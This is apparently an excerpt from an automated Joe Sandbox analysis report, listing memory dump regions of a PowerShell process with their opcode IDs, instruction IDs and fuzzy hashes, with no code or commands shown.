                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9311593dfaa316a7568c404e790a89a0ed9466349b1b13d28b11c01df131c686
                                                                                                              • Instruction ID: 40b62d941768f1fb0c1eb6ec47e492cc6dad175edeb463d4e78f287a19c6c26b
                                                                                                              • Opcode Fuzzy Hash: 9311593dfaa316a7568c404e790a89a0ed9466349b1b13d28b11c01df131c686
                                                                                                              • Instruction Fuzzy Hash: 93E1A330A19A4D8FDF98DF9CC455AA977F1FF68300F15426AD449D72A6CA34EC82C781
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e6563f10cc66088b40ce795fa2face6d699761d4ffa8de82cf44cb20ffa86b4a
                                                                                                              • Instruction ID: 2e3a87e997ba6890c55024a440cf9c16d2ed6757ad7c850faaadfef70eb1ef60
                                                                                                              • Opcode Fuzzy Hash: e6563f10cc66088b40ce795fa2face6d699761d4ffa8de82cf44cb20ffa86b4a
                                                                                                              • Instruction Fuzzy Hash: 34B1C63060DB8D4FDBA9DF28C8557E93BE1FF55310F54426AE84DC72E2CA3499458B82
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fd705f4d9c6f208395defbb81afa0e5445cc13cbc7fa01735f1afca0892f3084
                                                                                                              • Instruction ID: c8a7f897d9fa572edb23579c86f62a3fb4da42fb158984487f2c1521e30bb0b2
                                                                                                              • Opcode Fuzzy Hash: fd705f4d9c6f208395defbb81afa0e5445cc13cbc7fa01735f1afca0892f3084
                                                                                                              • Instruction Fuzzy Hash: 51714C62A0EBC90FE7755BE85D265B43FA0EF56300F0942BFE498871F7D914A905C782
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1779786947.00007FFD9B67D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B67D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b67d000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4d86ac78abcfe895600cf2ee21ec501c1621500111ee558cbfff96558c43deba
                                                                                                              • Instruction ID: da32ceb85bc3ca634e790e3604676889f68c5a4997d8645d789f0e792e969895
                                                                                                              • Opcode Fuzzy Hash: 4d86ac78abcfe895600cf2ee21ec501c1621500111ee558cbfff96558c43deba
                                                                                                              • Instruction Fuzzy Hash: D541037140EBC44FE766CB2998559523FF4EF56220B1A05EFD0C8CF1A3D625A84AC7A2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 54bc6c12403e71f48db1621e5bc5b2f667c4e421b57bf486df0bf5033f21a88c
                                                                                                              • Instruction ID: 0d108b4e9650c092a77b19c33300900894a16802f6c9376c3c81630ef68d3175
                                                                                                              • Opcode Fuzzy Hash: 54bc6c12403e71f48db1621e5bc5b2f667c4e421b57bf486df0bf5033f21a88c
                                                                                                              • Instruction Fuzzy Hash: 0F213B7190CB4C4FDB58DF9CD84A7E97BE1EB96321F04426BD048C31A6D674A44ACB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bf5c1b2ad3012c6f7f9099ee8d464ceea1a87a655089a266473bb9582741947d
                                                                                                              • Instruction ID: e29f43cdac328fe79f04cbc99b21e3bca301c3e8b9cda9ee6ffbeb8789d1f08d
                                                                                                              • Opcode Fuzzy Hash: bf5c1b2ad3012c6f7f9099ee8d464ceea1a87a655089a266473bb9582741947d
                                                                                                              • Instruction Fuzzy Hash: C5312130A1A64D8EFBF89F54CC19BF93290FF45719F810239D44E861B3DA386A45CB12
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0ab6da5e3b7a10985376652421062a6ddadee4a469fb2f858efbaa927a2b489e
                                                                                                              • Instruction ID: 49c6b4e2a87d3571d9cbe67c62f0d1724114ef7dd989a2e91f75bf6ebbfe3878
                                                                                                              • Opcode Fuzzy Hash: 0ab6da5e3b7a10985376652421062a6ddadee4a469fb2f858efbaa927a2b489e
                                                                                                              • Instruction Fuzzy Hash: C501677121CB0C8FD748EF0CE451AA9B7E0FB95365F10056DE58AC36A5D636E881CB45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a942282f91d899f0bf5be7bce8d17b2f2335eb0836e43777f7ae71f047420138
                                                                                                              • Instruction ID: 778610747368640e849fa01a61cfc4746e228059f73adb1589749c2b8eff2863
                                                                                                              • Opcode Fuzzy Hash: a942282f91d899f0bf5be7bce8d17b2f2335eb0836e43777f7ae71f047420138
                                                                                                              • Instruction Fuzzy Hash: 3EF0E93081878D8FDB46DF6488199E57FA0FF16310F0502ABE85CC70B2DB34A954CB92
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 5K_^
                                                                                                              • API String ID: 0-730761414
                                                                                                              • Opcode ID: 1bbfe87f0547676925b865e38db4e09bb7fce7bf58719ddfecc6c6d8cdfef789
                                                                                                              • Instruction ID: 86cc8c2a922004963d28b6ef1775d81d5359f903d387395799a03552e6d40b7c
                                                                                                              • Opcode Fuzzy Hash: 1bbfe87f0547676925b865e38db4e09bb7fce7bf58719ddfecc6c6d8cdfef789
                                                                                                              • Instruction Fuzzy Hash: 28B1A067A0E3DA0FE75397BD58B50D67F60EE5326830A02F7D4C48F0A3EE19650B8661
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ee05e35a06710c61d7faee24d9c34d9ef81372cfd4b345bb9aa4d56ca24f6ab2
                                                                                                              • Instruction ID: 05fb0b5fe662c451d7576c8d4e731549143b96aa016d9c33fe4b9caf9b83208e
                                                                                                              • Opcode Fuzzy Hash: ee05e35a06710c61d7faee24d9c34d9ef81372cfd4b345bb9aa4d56ca24f6ab2
                                                                                                              • Instruction Fuzzy Hash: 5712B167B0E7D25FE32766EC58B60E53FA0EF5326471E01F7C4C58A0B3E919294A8361